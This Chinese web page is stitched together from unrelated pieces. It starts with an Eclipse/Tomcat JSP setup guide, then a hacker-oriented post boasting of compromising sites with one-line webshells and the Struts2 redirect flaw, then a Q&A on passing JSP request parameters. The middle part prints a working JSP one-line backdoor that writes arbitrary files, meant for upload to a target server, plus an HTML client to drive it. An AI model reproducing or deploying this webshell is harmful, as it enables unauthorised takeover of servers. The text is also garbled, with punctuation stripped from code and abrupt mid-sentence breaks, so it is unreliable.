1、打开eclipse,点击file new一个动网项目。
2、输入你的项目名称后,单击next,勾选。
3、打开项目,会看有一个自动生成的webxml映像文件。
4、至此配置文件好了,所以直接点击WebContent右键new一个jsp文件 命名为indexjsp。
5、 indexjsp需要配置成UTF-8 或gbk2312 否则无法运行中文字符串。
6、可以在里面顶一个jsp页面呢 天骄java程序需要使用<%%>在任何一个位置都可以 。
7、当然这些都是服务器正常运行的情况下 ,如果Tomcat没有配置好那么需要以下步骤:找到Servers点击。
8、选择tomcat并且命名 。
9、Tomcat配置完成。
你先测试一下你的tomcat60是否已经正确安装。。。你可以启动tomcat60在地址栏输入>相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨腥风的Struts2漏洞利用潮即将来临。
说了这么多废话,本文的目的是什么呢?其实只是想记录一下JSP几种后门代码啦,因为曾经找JSP菜刀马找的老辛苦了。
1、首先是JSP一句话木马和它的客户端小伙伴。(小伙伴们都惊呆了~~~)
以下是服务端,保存成onejsp并上传至目标服务器中。
<%if(requestgetParameter("f")!=null)(new javaioFileOutputStream(applicationgetRealPath("")+requestgetParameter("f")))write(requestgetParameter("t")getBytes());%>
通过使用一句话木马客户端连接onejsp木马。
将下列代码保存为html页面:
<html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shelljsp><input type=button onclick="javascript:getaction=documentgeturlvalue;getsubmit()" value=提交> </form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(requestgetParameter("f")!=null)(new javaioFileOutputStream(applicationgetRealPath("\")+requestgetParameter("f")))write(requestgetParameter("t")getBytes());%> </textarea> </div></body>
保存完成后,打开html页面,写入一句话木马服务端地址,例如>有几种方式吧!首先看你的请求类型 如果是get就是最简单的QueryString 如果是post就通过Form来获取还有一种就是通过在action方法里的参数获取,就形如action/5 就可以把5传进去,但是这个需要在配置文件中对mvc的路由进行配置 才能获取相关信息!很简单 你在<a>标签中的href属性后面传值
比如你的借书界面得到的书名叫name
那么 String name = requestgetParameter("你传过来的书名");
<a href="dolendjspbookname" + name />
这样你在delendjsp中就可以通过requestgetParameter("bookname")拿到你传的书名了
或者你在借书界面中创建一个>
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)